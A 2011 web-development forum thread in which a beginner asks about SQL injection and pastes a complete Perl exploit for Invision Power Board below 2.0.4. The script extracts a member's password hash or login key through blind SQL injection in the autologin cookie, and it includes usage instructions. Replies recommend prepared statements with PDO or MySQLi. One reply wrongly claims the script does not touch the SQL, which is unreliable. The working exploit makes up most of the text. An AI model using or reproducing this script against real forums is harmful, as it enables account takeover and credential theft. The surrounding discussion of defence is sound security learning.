7 replies to this topic

[VakhoQ]

we know that, if we want to make a good web page, we should make a security. I only know about XSS and SQL injection Attacks. Ok, we know that, if we want to make a security for Injection we should use mysql_real_escape_string() or preg_match() or we can use also httaccs. but i've just seen SQL injection Exploiit for IPB Forum. its hard to belive that IPB creator does not uses escape string fucntion. How hackers can take information from SQL? - i don't know , I need answers. and is there any other way to break web page, i want to know about the bugs, to create a good web page. Also, Generally, I'm going to learn ASP.net. is MSSQL with ASP more safely, what do you think aboutt this?

For example SQL Exploit.

if (@ARGV < 4) { &usage; }


$server = $ARGV[0];

$path     = $ARGV[1];

$member_id = $ARGV[2];

$target = $ARGV[3];


$pass = ($target)?('member_login_key'):('password');


$server =~ s!(http:\/\/)!!;


$request  = 'http://';

$request .= $server;

$request .= $path;


$s_num = 1;

$|++;

$n = 0;


print "[~]      SERVER : $server\r\n";

print "[~]        PATH : $path\r\n";

print "[~] MEMBER ID : $member_id\r\n";

print "[~]      TARGET : $target";

print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));

print "\r\n";

print "[~] SEARCHING PASSWORD ... [|]";


($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;


while(1)

{

if(&found(47,58)==0) { &found(96,122); }

$char = $i;

if ($char=="0")

 {

 if(length($allchar) > 0){

 print qq{\b\b DONE ]


 MEMBER ID : $member_id

 };

 print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));

 print $allchar."\r\n";

 }

 else

 {

 print "\b\b FAILED ]";

 }

 exit();

 }

else

 {

  $allchar .= chr(42);

 }

$s_num++;

}


sub found($$)

 {

 my $fmin = $_[0];

 my $fmax = $_[1];

 if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }


 $r = int($fmax - ($fmax-$fmin)/2);

 $check = " BETWEEN $r AND $fmax";

 if ( &check($check) ) { &found($r,$fmax); }

 else { &found($fmin,$r); }

 }


sub crack($$)

 {

 my $cmin = $_[0];

 my $cmax = $_[1];

 $i = $cmin;

 while ($i<$cmax)

  {

  $crcheck = "=$i";

  if ( &check($crcheck) ) { return $i; }

  $i++;

  }

 $i = 0;

 return $i;

 }


sub check($)

 {

 $n++;

 status();

 $ccheck = $_[0];

 $pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";

 $pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28";

 $pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";

 $pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

 $nmalykh       = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0%E0%F1%21%20";

 $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");


 printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",

 $path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh);


 while(<$socket>)

  {

  if (/Set-Cookie: session_id=0;/) { return 1; }

  }


 return 0;

 }


sub status()

{

  $status = $n % 5;

  if($status==0){ print "\b\b/]";  }

  if($status==1){ print "\b\b-]";  }

  if($status==2){ print "\b\b\\]"; }

  if($status==3){ print "\b\b|]";  }

}


sub usage()

 {

 print q(

 Invision Power Board v < 2.0.4 SQL injection exploit

 ----------------------------------------------------

 USAGE:

 ~~~~~~

 r57ipb2.pl [server] [/folder/] [member_id] [target]


 [server]       - host where IPB installed

 [/folder/]  - folder where IPB installed

 [member_id] - user id for brute


 targets:

                  0 - IPB 1.*

                  1 - IPB 2.* (Prior To 2.0.4)

 );

 exit();

 }

Edited by VakhoQ, 17 March 2011 - 07:43 AM.

[Orjan]

The language itself isn't safer, it's only on how you use the language. Some languages could have easier or better security functions, but they still need to be used.

[Alexander]

Changing the language does not hide security issues automatically, you still have to use prepared statements directly with the MSSQL driver in ASP.NET, which you can do with PHP easily with PDO or MySQLi to avoid SQL injection.

Further, your code does not do anything to the SQL. It sends the server a user session hash and password hash which the author happened to leave vulnerable to help logging in, I have not seen somebody do something like this before, so it is not some "crazy" security risk you should change a language for..

[VakhoQ]

Alexander said:

Further, your code does not do anything to the SQL. It sends the server a user session hash and password hash which the author happened to leave vulnerable to help logging in, I have not seen somebody do something like this before

it's interesting... Could you give me an example about this? or if you know some books or tutorial for this sesion?

[VakhoQ]

I have this question too:
If I only use mysql_real_escape_string() and preg_match() so you can't make Injection by URL. Ok. But could you write SQL exploit by perl? - thats interesting- I need certain answer - if somebody can write Perl Exploit when I only use escape string function? :huh:
thanks :)

[VakhoQ]

is there any other advices?.. :)

[Alexander]

Perl is just a text processing language that may or may not make writing an automated exploit easier (for example you could deploy and run the script from the command line in a simple fashion maybe without scripting plugins, with other scripting languages you may not be able to)

In your original question, if you escape or filter all data (sanitization) you should be safe. If you are very concerned, then try using PDO or MySQLi prepared statements where their injections are meaningless to your database and you do not even need to escape! (with precaution)

Again, the Perl exploit you mentioned has nothing to do with Perl itself and can be done in any language, and it exploits something that I doubt you will ever write (it is very specific)

[VakhoQ]

Alexander

thanks. your answer is wonderful :)